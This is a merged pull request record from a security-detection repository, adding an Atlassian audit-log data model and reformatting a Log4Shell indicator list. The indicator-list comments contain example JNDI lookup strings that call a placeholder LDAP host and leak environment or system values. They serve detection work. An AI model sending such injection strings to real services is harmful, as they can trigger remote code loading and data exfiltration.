### PR TITLE
Created Atlassian Datamodel and Add to Standard Detections

### PR DESCRIPTION
**Pull request by bseb**
### Background
New Log type Added

### Changes
Created Datamodel for Atlassian, added to standard detections

### Testing

* Unit tests

### CODE REVIEW

**Comment by bseb** [comment]
[This PAT PR needs merged](https://github.com/panther-labs/panther_analysis_tool/pull/157) and a release cut before the tests will pass here

File: data_models/atlassian_data_model.py [hunk 1]
```diff
@@ -0,0 +1,36 @@
...
+    if deep_get(event, "AuditLog", "Type") == "group_deleted":
+        return event_type.USER_GROUP_DELETED
+
+    if deep_get(event, "AuditLog", "Type") == "user_granted_role":
+        return event_type.USER_ROLE_MODIFIED
+
+    if deep_get(event, "AuditLog", "Type") == "user_revoked_role":
+        return event_type.USER_ROLE_DELETED
+
+    return None
```
Comment (darwayne) [inline data_models/atlassian_data_model.py:36]: WDYT about saving auditLog type into a variable at the top to dry things up and make it easier to read? Also you could use a map to simplify this further

e.g.

```suggestion
 auditLogTypeMap = {
    "user_login": event_type.SUCCESSFUL_LOGIN,
    "user_logout": event_type.SUCCESSFUL_LOGOUT,
    "user_created": event_type.USER_ACCOUNT_CREATED,
    "twosv_disabled_for_user": event_type.MFA_DISABLED,
    "group_created": event_type.USER_GROUP_CREATED,
    "group_deleted": event_type.USER_GROUP_DELETED,
    "user_granted_role": event_type.USER_ROLE_MODIFIED,
    "user_revoked_role": event_type.USER_ROLE_DELETED   
}

def get_event_type(event):
    auditLogType = deep_get(event, "AuditLog", "Type")
    matched = auditLogTypeMap.get(auditLogType)
    if matched is not None:
        return matched

    if auditLogType in ("added_org_admin", "group_granted_admin_access"):
        return event_type.ADMIN_ROLE_ASSIGNED

    return None 
```

**Review by darwayne — APPROVED** [review]

File: global_helpers/panther_iocs.py [hunk 2]
```diff
@@ -781,14 +781,14 @@
...
-    "${::-j", # example: ${${::-j}${::-n}di:${::-l}d${::-a}p://example.com:1234/callback}
+    "${jndi:",  # breadth
+    "${lower:",  # example: ${jn${lower:d}i:l${lower:d}ap://example.${lower:c}om:1234/callback}
+    "${upper:",  # example: ${jnd${upper:i}:ldap://example.com:1234/callback/}
+    "${env:",  # example: ${jndi:ldap://example.com:1234/callback/${env:USER}
+    "${sys:",  # example: ${jndi:ldap://example.com:1234/callback/${sys:java.version}
+    "${java:",  # example: ${jndi:ldap://example.com:1234/callback/${java:os}
+    "${date:",  # example: ${jndi:ldap://example.com:1234/callback/${date:MM-dd-yyyy}
+    "${::-j",  # example: ${${::-j}${::-n}di:${::-l}d${::-a}p://example.com:1234/callback}
 }
```
Comment (bseb) [inline global_helpers/panther_iocs.py:792]: this was `make fmt`

**Review by darwayne — APPROVED** [review]

**Comment by bseb** [comment]
>code looks good ... but looks something is off with your unit tests
 @darwayne  Yeah these will fail until [this PAT PR ](https://github.com/panther-labs/panther_analysis_tool/pull/157)merges

**Comment by darwayne** [comment]
oh yeah that's right

File: data_models/atlassian_data_model.py [hunk 3]
```diff
@@ -0,0 +1,24 @@
+import panther_event_type_helpers as event_type
+from panther_base_helpers import deep_get
+
+ auditLogTypeMap = {
```
Comment (lindsey-w) [inline data_models/atlassian_data_model.py:4]: nice!

**Review by lindsey-w — APPROVED** [review]

File: data_models/atlassian_data_model.py (hunk 3 above)
Comment (bseb) [reply data_models/atlassian_data_model.py]: Gotta hand credit to @darwayne , this was his idea and a damn good one.

**Review by darwayne — APPROVED** [review]

**Review by lindsey-w — APPROVED** [review]

**Pull request merged**